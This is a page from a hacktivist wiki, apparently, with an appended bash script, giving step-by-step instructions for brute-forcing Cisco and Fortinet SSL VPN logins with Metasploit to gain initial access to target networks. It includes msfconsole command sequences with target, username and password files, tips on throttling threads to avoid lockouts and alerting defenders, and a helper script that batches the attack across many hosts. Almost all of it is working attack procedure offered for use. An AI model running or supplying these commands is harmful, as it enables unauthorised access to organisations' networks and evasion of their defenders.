VPN brute forcing

From Enlace Hacktivista
Latest revision as of 12:19, 30 March 2024

Brute force common corporate VPNs (https://www.rapid7.com/blog/post/2023/08/29/under-siege-rapid7-observed-exploitation-of-cisco-asa-ssl-vpns) to gain initial access to target networks. Install Metasploit (https://enlacehacktivista.org/index.php?title=Exploitation#Metasploit) and then see the Initial access TTPs page on mass port scanning (https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures#Spray_and_pray) to build the target list. Large username and password files make these modules stall for a very long time, because each host is tried against every user/password pair; use smaller user (https://github.com/projectdiscovery/nuclei-templates/blob/main/helpers/wordlists/wp-users.txt) and password (https://github.com/projectdiscovery/nuclei-templates/blob/main/helpers/wordlists/wp-passwords.txt) files, and split a large target list into several smaller host files rather than feeding one huge RHOSTS file to a single run. Keep THREADS modest as well: VPN appliances commonly lock accounts after a handful of failed logins, which both slows the run further and alerts defenders.

Word lists:
* https://enlacehacktivista.org/index.php/Initial_Access_Tactics,_techniques_and_procedures#Common_and_leaked_passwords

CISCO

<pre>
sudo systemctl start postgresql
msfdb init
</pre>

<pre>
msfconsole
use auxiliary/scanner/http/cisco_ssl_vpn
set RHOSTS file:/home/targets_443.txt
set RPORT 443
set USER_FILE /home/users.txt
set PASS_FILE /home/pass.txt
set THREADS 10
run
</pre>

FORTI SSL VPN

<pre>
sudo systemctl start postgresql
msfdb init
</pre>

<pre>
msfconsole
use auxiliary/scanner/http/fortinet_ssl_vpn
set RHOSTS file:/home/targets_10443.txt
set RPORT 10443
set USER_FILE /home/users.txt
set PASS_FILE /home/pass.txt
set THREADS 10
run
</pre>
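The stall described at the top of the page is easier to manage when each msfconsole process only covers a slice of the target list. The shell helper below is an added example, not code from this wiki page: it splits a host file into small chunks, writes one Metasploit resource script per chunk using the module and option names shown in the Cisco and Fortinet blocks above, and then feeds the scripts to msfconsole one at a time so a hang is bounded to a single chunk. The chunk size, the output directory layout and the hosts_NNN file names are assumptions of the example.

```bash
#!/usr/bin/env bash
# Added example (not from the page): batch a Metasploit VPN brute-force run.
# Module and option names match the page (auxiliary/scanner/http/cisco_ssl_vpn,
# RHOSTS/RPORT/USER_FILE/PASS_FILE/THREADS). The chunk size, the output
# directory and the hosts_NNN naming are this example's own assumptions.

# gen_vpn_rc MODULE RPORT HOSTS_FILE USER_FILE PASS_FILE CHUNK OUTDIR
#   Splits HOSTS_FILE into CHUNK-line pieces and writes one resource script
#   (<piece>.rc) per piece into OUTDIR. Prints the number of scripts written.
gen_vpn_rc() {
    local module="$1" rport="$2" hosts="$3" users="$4" passes="$5" chunk="$6" outdir="$7"
    mkdir -p "$outdir"
    # Resolve to absolute paths: the "file:" form of RHOSTS must stay valid
    # no matter which directory msfconsole is started from.
    users=$(readlink -f "$users")
    passes=$(readlink -f "$passes")
    outdir=$(readlink -f "$outdir")
    # Drop blank and comment lines, then cut the target list into small files
    # (hosts_000, hosts_001, ...) so no single run has to cover every host.
    grep -Ev '^[[:space:]]*(#|$)' "$hosts" | split -l "$chunk" -d -a 3 - "$outdir/hosts_"
    local n=0 piece
    for piece in "$outdir"/hosts_[0-9][0-9][0-9]; do
        [ -e "$piece" ] || break
        cat > "$piece.rc" <<EOF
use $module
set RHOSTS file:$piece
set RPORT $rport
set USER_FILE $users
set PASS_FILE $passes
set THREADS 10
run
exit
EOF
        n=$((n + 1))
    done
    printf '%s\n' "$n"
}

# run_vpn_rcs OUTDIR
#   Feeds each generated script to a fresh msfconsole (-q quiet, -r resource
#   script). Every process exits after its own chunk, so a stalled chunk does
#   not take the whole target list down with it and the loop can be resumed.
run_vpn_rcs() {
    local rc
    for rc in "$1"/hosts_*.rc; do
        msfconsole -q -r "$rc"
    done
}
```

Generate the scripts with `gen_vpn_rc auxiliary/scanner/http/cisco_ssl_vpn 443 targets_443.txt users.txt pass.txt 50 out/` and then `run_vpn_rcs out/`; for the Fortinet portals swap in `auxiliary/scanner/http/fortinet_ssl_vpn` and `10443`. If the password list is still too long for one run, the same `split` step can be applied to PASS_FILE.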